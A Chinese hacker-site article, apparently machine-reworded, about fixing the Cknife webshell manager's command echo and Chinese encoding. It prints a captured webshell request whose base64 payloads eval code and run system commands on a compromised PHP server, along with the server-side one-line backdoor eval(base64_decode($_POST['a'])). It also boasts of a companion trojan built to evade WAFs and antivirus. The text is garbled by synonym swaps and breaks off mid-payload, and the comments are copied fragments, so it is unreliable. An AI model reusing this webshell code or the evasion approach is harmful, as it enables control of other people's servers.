Cknife的PHP功能部分修正,解决SHELL无法回显以及中文乱码
手机扫一扫
黑客病毒漏洞黑防入侵DDOS病毒硬件
黑资讯>黑客软件>Cknife的PHP功能部分修正,解决SHELL无法回显以及中文乱码

Cknife的PHP功能部分修正,解决SHELL无法回显以及中文乱码

黑客软件hacker2019-06-14 6:20:2210254A+A-

在如今大街小巷水果刀都存有侧门难题的那时候,Cknife杀手锏了。由于开源系统,因此安全性。由于可实际操作的室内空间很大的,也非常合适过各种各样WAF。下边就是说处理2个疑难问题的全过程。期待能够帮上诸位白帽子。

  专用工具强烈推荐:Cknife,跨平台版中国菜刀宣布开源系统?

Cknife的PHP功能部分修正,解决SHELL无法回显以及中文乱码 第1张

  可是应用全过程中也碰到了某些小难题,被调侃数最多的就是说中文乱码及其一部分Windows自然环境shell没法回显。下边我来剖析全过程,解决困难:最先是shell回显难题,shell在一部分windows自然环境中是不可以实行cmd的

  哇,气死人了。

  昨天晚上写出来配套设施的过狗过D盾过电脑管家一句话木马,也把Cknife的统计数据干了数据加密。

  显然,这物品没办法好好地应用啊!

  检测一段话(服务器端):

  因此给Cknife,联接shell,开启burp抓包

  它是实行”whoami”那时候的post请求,沒有回到的报文。?

  POST /test.Python .com/1.2 User-Agent: javas/1.8.0_121 Host: localhost

  Accept: text/html语言, image/gif, image/jpeg, *; q=.4, */*; q=.4

  Content-type: application/x-WWW-form-urlencoded

  Content-Length: 598 Connection: close a=QGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbYWN0aW9uXSkpOw== &action=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2bfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtzeXN0ZW0oJHIuIiAyPiYxIiwkcmV0KTtwcmludCAoJHJldCE9MCk/IgpyZXQ9eyRyZXR9CiI6IiI7O2VjaG8oInw8LSIpO2RpZSgpOw%3d%3d&z1=Y21k&z2=Y2QvZCJEOlxwaHBTdHVkeVxXV1dcIiZkaXImZWNobyBbU10mY2QmZWNobyBbRV0%3d

  当地仿真模拟了服务器端解决手机客户端post请求的情景

  全句智能化原創Python //手机客户端上传post请求 $_POST['a'] = 'QGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbYWN0aW9uXSkpOw==';

  $_POST['z1']='Y21k';

  $_POST['z2']='Y2QvZCJEOlxwaHBTdHVkeVxXV1dcIiZ3aG9hbWkmZWNobyBbU10mY2QmZWNobyBbRV0=';

  $_POST['action']='QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtzeXN0ZW0oJHIuIiAyPiYxIiwkcmV0KTtwcmludCAoJHJldCE9MCk/IgpyZXQ9eyRyZXR9CiI6IiI7O2VjaG8oInw8LSIpO2RpZSgpOw=='; //服务器端 eval(base64_decode($_POST['a']).';');

  随后Base64编解码

  全句智能化原創Python $_POST['z1']='Y21k';

  $_POST['z2']='Y2Qv


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
漏洞黑客黑客技术黑客网站黑客博客黑客论坛黑客入门免费黑客网黑客教程渗透测试渗透培训代码审计白帽黑客黑客软件黑客工具

相关文章

  • 4条评论
  • 世味绿脊2022-06-01 20:34:06
  • skYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtzeXN0ZW0oJHIuIiAyP
  • 掩吻掩吻2022-06-01 21:42:12
  • 户端post请求的情景  全句智能化原創Python //手机客户端上传post请求 $_POST['a'] = 'QGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbYWN0aW9uX
  • 惑心节枝2022-06-02 01:28:18
  • eXN0ZW0oJHIuIiAyPiYxIiwkcmV0KTtwcmludCAoJHJldCE9MCk/IgpyZXQ9eyRyZXR9CiI6IiI7O2VjaG8oInw8LSIpO2RpZSgpOw%3d%3d&z1=Y
  • 野欢岛徒2022-06-01 21:52:31
  • 境shell没法回显。下边我来剖析全过程,解决困难:最先是shell回显难题,shell在一部分windows自然环境中是不可以实行cmd的  哇,气死人了。  昨天晚上写出来配套设施的过
发表评论

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理